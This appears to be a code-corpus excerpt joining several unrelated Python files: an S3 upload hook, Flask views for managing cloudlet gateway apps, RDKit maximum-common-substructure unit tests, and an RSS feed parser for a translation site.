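        # e.g. for wildcard_key 'logs/2017-*.gz' the listing prefix is
        # 'logs/2017-'; fnmatch below then filters the listed keys against
        # the full wildcard pattern.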
klist = self.list_keys(bucket_name, prefix=prefix, delimiter=delimiter)
if not klist:
return None
key_matches = [k for k in klist if fnmatch.fnmatch(k, wildcard_key)]
return bucket.get_key(key_matches[0]) if key_matches else None
def check_for_prefix(self, bucket_name, prefix, delimiter):
"""
Checks that a prefix exists in a bucket
"""
prefix = prefix + delimiter if prefix[-1] != delimiter else prefix
prefix_split = re.split(r'(\w+[{d}])$'.format(d=delimiter), prefix, 1)
previous_level = prefix_split[0]
plist = self.list_prefixes(bucket_name, previous_level, delimiter)
return False if plist is None else prefix in plist
def load_file(
self,
filename,
key,
bucket_name=None,
replace=False,
multipart_bytes=5 * (1024 ** 3),
encrypt=False):
"""
Loads a local file to S3
:param filename: name of the file to load.
:type filename: str
:param key: S3 key that will point to the file
:type key: str
:param bucket_name: Name of the bucket in which to store the file
:type bucket_name: str
:param replace: A flag to decide whether or not to overwrite the key
if it already exists. If replace is False and the key exists, an
error will be raised.
:type replace: bool
:param multipart_bytes: If provided, the file is uploaded in parts of
this size (minimum 5242880). The default value is 5GB, since S3
cannot accept non-multipart uploads for files larger than 5GB. If
the file is smaller than the specified limit, the option will be
ignored.
:type multipart_bytes: int
:param encrypt: If True, the file will be encrypted on the server-side
by S3 and will be stored in an encrypted form while at rest in S3.
:type encrypt: bool
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
key_obj = bucket.get_key(key)
if not replace and key_obj:
raise ValueError("The key {key} already exists.".format(
**locals()))
key_size = os.path.getsize(filename)
if multipart_bytes and key_size >= multipart_bytes:
# multipart upload
from filechunkio import FileChunkIO
mp = bucket.initiate_multipart_upload(key_name=key,
encrypt_key=encrypt)
total_chunks = int(math.ceil(key_size / multipart_bytes))
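            # e.g. a 12 GiB file with the default 5 GiB multipart_bytes is
            # sent as ceil(12 / 5) = 3 parts (true division, via the
            # __future__ import above).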
sent_bytes = 0
try:
for chunk in range(total_chunks):
offset = chunk * multipart_bytes
bytes = min(multipart_bytes, key_size - offset)
with FileChunkIO(
filename, 'r', offset=offset, bytes=bytes) as fp:
logging.info('Sending chunk {c} of {tc}...'.format(
c=chunk + 1, tc=total_chunks))
mp.upload_part_from_file(fp, part_num=chunk + 1)
except:
mp.cancel_upload()
raise
mp.complete_upload()
else:
# regular upload
if not key_obj:
key_obj = bucket.new_key(key_name=key)
key_size = key_obj.set_contents_from_filename(filename,
replace=replace,
encrypt_key=encrypt)
logging.info("The key {key} now contains"
" {key_size} bytes".format(**locals()))
def load_string(self, string_data,
key, bucket_name=None,
replace=False,
encrypt=False):
"""
        Loads a string to S3
        This is provided as a convenience to drop a string in S3. It uses the
        boto infrastructure to ship data to s3. It is currently using only
        a single part upload, and should not be used to move large amounts
        of data.
:param string_data: string to set as content for the key.
:type string_data: str
:param key: S3 key that will point to the file
:type key: str
:param bucket_name: Name of the bucket in which to store the file
:type bucket_name: str
:param replace: A flag to decide whether or not to overwrite the key
if it already exists
:type replace: bool
:param encrypt: If True, the file will be encrypted on the server-side
by S3 and will be stored in an encrypted form while at rest in S3.
:type encrypt: bool
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
key_obj = bucket.get_key(key)
if not replace and key_obj:
raise ValueError("The key {key} already exists.".format(
**locals()))
if not key_obj:
key_obj = bucket.new_key(key_name=key)
key_size = key_obj.set_contents_from_string(string_data,
replace=replace,
encrypt_key=encrypt)
logging.info("The key {key} now contains"
" {key_size} bytes".format(**locals()))
|
OpenEdgeComputing/elijah-openstack
|
refs/heads/master
|
cloudlet-gateway/caas/provider/views.py
|
2
|
# -*- coding: utf-8 -*-
"""app views."""
import os
import requests
from flask import Blueprint, render_template, request, flash, url_for, redirect, current_app, send_from_directory, \
Response, abort, stream_with_context
from flask_login import login_required, current_user
import ruamel.yaml
from caas.provider.api import create_application, rm_config_files
from caas.provider.forms import NewAppForm
from caas.provider.models import App as AppModel, Cluster
from caas.utils import flash_errors
blueprint = Blueprint('provider', __name__, url_prefix='/providers', static_folder='../static')
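# All views below are therefore served under the /providers prefix,
# e.g. apps() answers at /providers/ and /providers/apps.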
@blueprint.route('/members')
@login_required
def members():
"""show current apps"""
return render_template('providers/members.html')
@blueprint.route('/', methods=["GET", "POST"])
@blueprint.route('/apps', methods=["GET", "POST"])
@login_required
def apps():
"""show current apps"""
# get clusters for current user
clusters = Cluster.query.filter_by(user_id=current_user.id).all()
cluster_choices = [(cluster.name, cluster.name) for cluster in clusters]
form = NewAppForm(cluster_choices)
if request.method == 'POST':
if form.validate_on_submit():
uploaded_file = form.config_file.data
app_name = form.appname.data
user_id = current_user.id
cluster = Cluster.query.filter_by(name=form.clustername.data, user_id=current_user.id).first()
create_application(app_name, user_id, uploaded_file, cluster)
flash('Created a new app', 'success')
redirect_url = request.args.get('next') or url_for('provider.apps')
return redirect(redirect_url)
else:
flash_errors(form)
display_info = {}
for app in current_user.apps:
display_info[app.name] = app.config_file_name[AppModel.APP_TYPE(app.type)]
cluster_monitor_urls = {}
for cluster in clusters:
cluster_monitor_urls[cluster.name] = '{}{}:8080'.format(current_app.config['LELPROXY'],
cluster.leader_public_ip)
return render_template('providers/services.html', apps=display_info, clusters=clusters, form=form,
cluster_monitor_urls=cluster_monitor_urls)
@blueprint.route('/delete/<string:appname>', methods=["GET"])
@login_required
def delete_apps(appname):
new_apps = AppModel.query.filter_by(name=appname, user_id=current_user.id).all()
if new_apps:
for new_app in new_apps:
current_app.logger.debug("deleting app {}".format(new_app))
rm_config_files(new_app)
new_app.delete()
flash('Deleted application {}'.format(appname), 'success')
redirect_url = request.args.get('next') or url_for('provider.apps')
return redirect(redirect_url)
def read_config_data(app, app_type):
with open(os.path.join(current_app.config['UPLOADED_CONFIG_FILE_DIR'],
app.config_file_name[app_type]), 'r') as f:
config_data = ruamel.yaml.load(f.read(), ruamel.yaml.RoundTripLoader)
return config_data
@blueprint.route('/config_files/<string:appname>', methods=["GET"])
@login_required
def config_files(appname):
app = AppModel.query.filter_by(name=appname).first()
if not app:
abort(404, "{} doesn't exist".format(appname))
app_type = AppModel.APP_TYPE(app.type)
config_data = {}
if app_type != AppModel.APP_TYPE.Mixed:
part_config_data = read_config_data(app, app_type)
config_data[app_type.value] = part_config_data
else: # app_type == AppModel.APP_TYPE.Mixed:
vm_config_data = read_config_data(app, AppModel.APP_TYPE.VMs)
config_data[AppModel.APP_TYPE.VMs.value] = vm_config_data
ct_config_data = read_config_data(app, AppModel.APP_TYPE.Containers)
config_data[AppModel.APP_TYPE.Containers.value] = ct_config_data
return Response(ruamel.yaml.dump(config_data, Dumper=ruamel.yaml.RoundTripDumper), mimetype='text/plain')
|
soerendip42/rdkit
|
refs/heads/master
|
rdkit/Chem/UnitTestMCS.py
|
4
|
import unittest
import time
from rdkit import Chem
from rdkit.Chem import MCS
def load_smiles(text):
mols = []
for line in text.strip().splitlines():
smiles = line.split()[0]
mol = Chem.MolFromSmiles(smiles)
assert mol is not None, smiles
mols.append(mol)
return mols
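# e.g. load_smiles("c1ccccc1O phenol\nCO methanol") returns two Mol objects;
# everything after the first whitespace on a line is ignored (a label).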
_ignore = object()
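# _ignore is a unique sentinel: it lets callers skip a check entirely while
# still allowing None as a legitimate expected value (e.g. smarts=None).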
class MCSTestCase(unittest.TestCase):
def assert_search(self, smiles, numAtoms, numBonds, smarts=_ignore, **kwargs):
result = MCS.FindMCS(smiles, **kwargs)
self.assert_result(result, completed=1, numAtoms=numAtoms, numBonds=numBonds,
smarts=smarts)
def assert_result(self, result, completed=_ignore, numAtoms=_ignore,
numBonds=_ignore, smarts=_ignore):
if completed is not _ignore:
self.assertEqual(result.completed, completed)
if numAtoms is not _ignore:
self.assertEqual(result.numAtoms, numAtoms)
if numBonds is not _ignore:
self.assertEqual(result.numBonds, numBonds)
if smarts is not _ignore:
self.assertEqual(result.smarts, smarts)
simple_mols = load_smiles("""
c1ccccc1O phenol
CO methanol""")
class TestMinAtoms(MCSTestCase):
def test_min_atoms_2(self):
self.assert_search(simple_mols, 2, 1, minNumAtoms=2)
def test_min_atoms_3(self):
self.assert_search(simple_mols, -1, -1, smarts=None, minNumAtoms=3)
def test_min_atoms_1(self):
try:
result = MCS.FindMCS(simple_mols, minNumAtoms=1)
except ValueError:
pass
else:
raise AssertionError("should have raised an exception")
maximize_mols = load_smiles("""
C12CCC1CC2OCCCCCCC 2-rings-and-chain-with-O
C12CCC1CC2SCCCCCCC 2-rings-and-chain-with-S
""")
class TestMaximize(MCSTestCase):
# C12CCC1CC2OCCCCCCC 2-rings-and-chain-with-O
# C12CCC1CC2SCCCCCCC 2-rings-and-chain-with-S
def test_maximize_default(self):
# default maximizes the number of bonds
self.assert_search(maximize_mols, 6, 7)
def test_maximize_atoms(self):
self.assert_search(maximize_mols, 7, 6, maximize="atoms")
def test_maximize_bonds(self):
self.assert_search(maximize_mols, 6, 7, maximize="bonds")
atomtype_mols = load_smiles("""
c1ccccc1O phenol
CCCCCCOn1cccc1 different-answers-depending-on-type
""")
class TestAtomTypes(MCSTestCase):
# The tests compare:
# c1ccccc1O
# CCCCCCOn1cccc1
def test_atom_compare_default(self):
self.assert_search(atomtype_mols, 4, 3, smarts='[#6](:[#6]):[#6]:[#6]')
def test_atom_compare_elements(self):
self.assert_search(atomtype_mols, 4, 3, smarts='[#6](:[#6]):[#6]:[#6]', atomCompare="elements")
def test_atom_compare_any(self):
        # Note: bond aromaticities must still match!
# 'cccccO' matches 'ccccnO'
self.assert_search(atomtype_mols, 6, 5, atomCompare="any")
def test_atom_compare_any_bond_compare_any(self):
# Linear chain of 7 atoms
self.assert_search(atomtype_mols, 7, 6, atomCompare="any", bondCompare="any")
def test_bond_compare_any(self):
# Linear chain of 7 atoms
self.assert_search(atomtype_mols, 7, 6, bondCompare="any")
isotope_mols = load_smiles("""
C1C[0N]CC[5C]1[1C][2C][2C][3C] C1223
C1CPCC[4C]1[2C][2C][1C][3C] C2213
""")
class TestIsotopes(MCSTestCase):
# C1C[0N]CC[5C]1[1C][2C][2C][3C] C1223
# C1CPCC[4C]1[2C][2C][1C][3C] C2213
def test_without_isotope(self):
# The entire system, except the N/P in the ring
self.assert_search(isotope_mols, numAtoms=9, numBonds=8)
def test_isotopes(self):
# 5 atoms of class '0' in the ring
self.assert_search(isotope_mols, 5, 4, atomCompare="isotopes")
def test_isotope_complete_ring_only(self):
# the 122 in the chain
self.assert_search(isotope_mols, 3, 2, atomCompare="isotopes", completeRingsOnly=True)
bondtype_mols = load_smiles("""
C1CCCCC1OC#CC#CC#CC#CC#CC first
c1ccccc1ONCCCCCCCCCC second
""")
class TestBondTypes(MCSTestCase):
# C1CCCCC1OC#CC#CC#CC#CC#CC
# c1ccccc1ONCCCCCCCCCC second
def test_bond_compare_default(self):
# Match the 'CCCCCC' part of the first ring, with the second's tail
self.assert_search(bondtype_mols, 6, 5)
def test_bond_compare_bondtypes(self):
# Repeat of the previous
self.assert_search(bondtype_mols, 6, 5, bondCompare="bondtypes")
def test_bond_compare_any(self):
# the CC#CC chain matches the CCCC tail
self.assert_search(bondtype_mols, 10, 9, bondCompare="any")
def test_atom_compare_elements_bond_compare_any(self):
self.assert_search(bondtype_mols, 10, 9, atomCompare="elements", bondCompare="any")
def test_atom_compare_any_bond_compare_any(self):
# complete match!
self.assert_search(bondtype_mols, 18, 18, atomCompare="any", bondCompare="any")
valence_mols = load_smiles("""
CCCCCCCCN
CCC[CH-]CCCC
""")
class TestValences(MCSTestCase):
def test_valence_compare_default(self):
# match 'CCCCCCCC'
self.assert_search(valence_mols, 8, 7)
def test_valence_compare_valence(self):
# match 'CCCC'
self.assert_search(valence_mols, 4, 3, matchValences=True)
    def test_valence_compare_valence_any_atoms(self):
# match 'CCCCN' to '[CH-]CCCC' (but in reverse)
self.assert_search(valence_mols, 5, 4, matchValences=True, atomCompare="any")
ring_mols = load_smiles("""
C12CCCC(N2)CCCC1 6-and-7-bridge-rings-with-N
C1CCCCN1 6-ring
C1CCCCCN1 7-ring
C1CCCCCCCC1 9-ring
NC1CCCCCC1 N+7-ring
C1CC1CCCCCC 3-ring-with-tail
C12CCCC(O2)CCCC1 6-and-7-bridge-rings-with-O
""")
def SELECT(mols, *offsets):
return [mols[offset-1] for offset in offsets]
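# SELECT takes 1-based offsets, e.g. SELECT(ring_mols, 1, 2) picks the
# bridged-ring molecule and the plain 6-ring.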
class TestRingMatchesRingOnly(MCSTestCase):
# C12CCCC(N2)CCCC1 6-and-7-bridge-rings-with-N
# C1CCCCN1 6-ring
# C1CCCCCN1 7-ring
# C1CCCCCCCC1 9-ring
# NC1CCCCCC1 N+7-ring
# C1CC1CCCCCC 3-ring-with-tail
# C12CCCC(O2)CCCC1 6-and-7-bridge-rings-with-O
def test_default(self):
# Should match 'CCCCC'
self.assert_search(ring_mols, 5, 4)
def test_ring_only(self):
# Should match "CCC"
self.assert_search(ring_mols, 3, 2, ringMatchesRingOnly=True)
def test_ring_only_select_1_2(self):
# Should match "C1CCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 2), 6, 6, ringMatchesRingOnly=True)
def test_ring_only_select_1_3(self):
# Should match "C1CCCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 3), 7, 7, ringMatchesRingOnly=True)
def test_ring_only_select_1_4(self):
# Should match "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 4), 9, 9, ringMatchesRingOnly=True)
def test_select_1_5(self):
# Should match "NCCCCCC"
self.assert_search(SELECT(ring_mols, 1, 5), 8, 7, ringMatchesRingOnly=False)
def test_ring_only_select_1_5(self):
# Should match "CCCCCC"
self.assert_search(SELECT(ring_mols, 1, 5), 7, 6, ringMatchesRingOnly=True)
def test_select_1_6(self):
# Should match "CCCCCCCCC" by breaking one of the 3-carbon ring bonds
self.assert_search(SELECT(ring_mols, 1, 6), 9, 8)
def test_ring_only_select_1_6(self):
# Should match "CCC" from the three atom ring
self.assert_search(SELECT(ring_mols, 1, 6), 3, 2, ringMatchesRingOnly=True)
def test_ring_only_select_1_7(self):
# Should match the outer ring "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 7), 9, 9)
def test_ring_only_select_1_7_any_atoms(self):
# Should match everything
self.assert_search(SELECT(ring_mols, 1, 7), 10, 11, ringMatchesRingOnly=True, atomCompare="any")
class TestCompleteRingsOnly(MCSTestCase):
# C12CCCC(N2)CCCC1 6-and-7-bridge-rings-with-N
# C1CCCCN1 6-ring
# C1CCCCCN1 7-ring
# C1CCCCCCCC1 9-ring
# NC1CCCCCC1 N+7-ring
# C1CC1CCCCCC 3-ring-with-tail
# C12CCCC(O2)CCCC1 6-and-7-bridge-rings-with-O
def test_ring_only(self):
# No match: "CCC" is not in a ring
self.assert_search(ring_mols, -1, -1, completeRingsOnly=True)
def test_ring_only_select_1_2(self):
# Should match "C1CCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 2), 6, 6, completeRingsOnly=True)
def test_ring_only_select_1_3(self):
# Should match "C1CCCCCCN1"
self.assert_search(SELECT(ring_mols, 1, 3), 7, 7, completeRingsOnly=True)
def test_ring_only_select_1_4(self):
# Should match "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 4), 9, 9, completeRingsOnly=True)
def test_ring_only_select_1_5(self):
# No match: "CCCCCC" is not in a ring
self.assert_search(SELECT(ring_mols, 1, 5), -1, -1, completeRingsOnly=True)
def test_ring_only_select_1_7(self):
# Should match the outer ring "C1CCCCCCCC1"
self.assert_search(SELECT(ring_mols, 1, 7), 9, 9, completeRingsOnly=True)
def test_ring_only_select_1_7_any_atoms(self):
# Should match everything
self.assert_search(SELECT(ring_mols, 1, 7), 10, 11, completeRingsOnly=True, atomCompare="any")
def test_ring_to_nonring_bond(self):
# Should allow the cO in phenol to match the CO in the other structure
self.assert_search(atomtype_mols, 2, 1, completeRingsOnly=True)
lengthy_mols = [Chem.MolFromSmiles("Nc1ccccc1"*20),
Chem.MolFromSmiles("Nc1ccccccccc1"*20)]
class TestTimeout(MCSTestCase):
# This should take over two minutes to process. Give it 0.1 seconds.
def test_timeout(self):
t1 = time.time()
result = MCS.FindMCS(lengthy_mols, timeout=0.1)
self.assert_result(result, completed=0)
self.assertTrue(result.numAtoms > 1)
self.assertTrue(result.numBonds >= result.numAtoms-1, (result.numAtoms, result.numBonds))
t2 = time.time()
self.assertTrue(t2-t1 < 0.5, t2-t1)
# Check for non-negative values
def test_timeout_negative(self):
try:
MCS.FindMCS(lengthy_mols, timeout=-1)
except ValueError:
pass
else:
raise AssertionError("bad range check for timeout")
if __name__ == "__main__":
unittest.main()
|
fake-name/ReadableWebProxy
|
refs/heads/master
|
WebMirror/management/rss_parser_funcs/feed_parse_extractGakuseitranslationsCom.py
|
1
|
def extractGakuseitranslationsCom(item):
'''
Parser for 'gakuseitranslations.com'
'''
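    # Note (inferred from context): extractVolChapterFragmentPostfix and
    # buildReleaseMessageWithType are not imported here; the surrounding
    # parser framework is assumed to supply them when this module is loaded.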
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|